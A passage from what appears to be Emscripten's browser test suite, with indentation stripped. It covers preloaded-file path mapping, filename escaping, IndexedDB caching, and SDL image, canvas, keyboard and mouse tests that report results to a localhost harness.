("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
os.makedirs('assets/sub/asset1/'.replace('\\', '/'))
os.makedirs('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir('dirrey')
except OSError:
pass
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
create_test_file('src.cpp', self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
create_test_file('file.txt', '''Hello!''')
self.compile_btest(['src.cpp', '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except OSError:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
run_process([PYTHON, FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
os.makedirs(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs('subdirr')
os.makedirs('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl_image.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl_image.c', '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.compile_btest([
'sdl_image_jpeg.c', '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
if self.is_wasm_backend():
return ['-s', 'ASYNCIFY']
else:
return ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1'] + self.get_async_args()
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
create_test_file('sdl_key.c', self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
self.compile_btest(['sdl_key.c', '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl_text.c', self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
self.compile_btest(['sdl_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
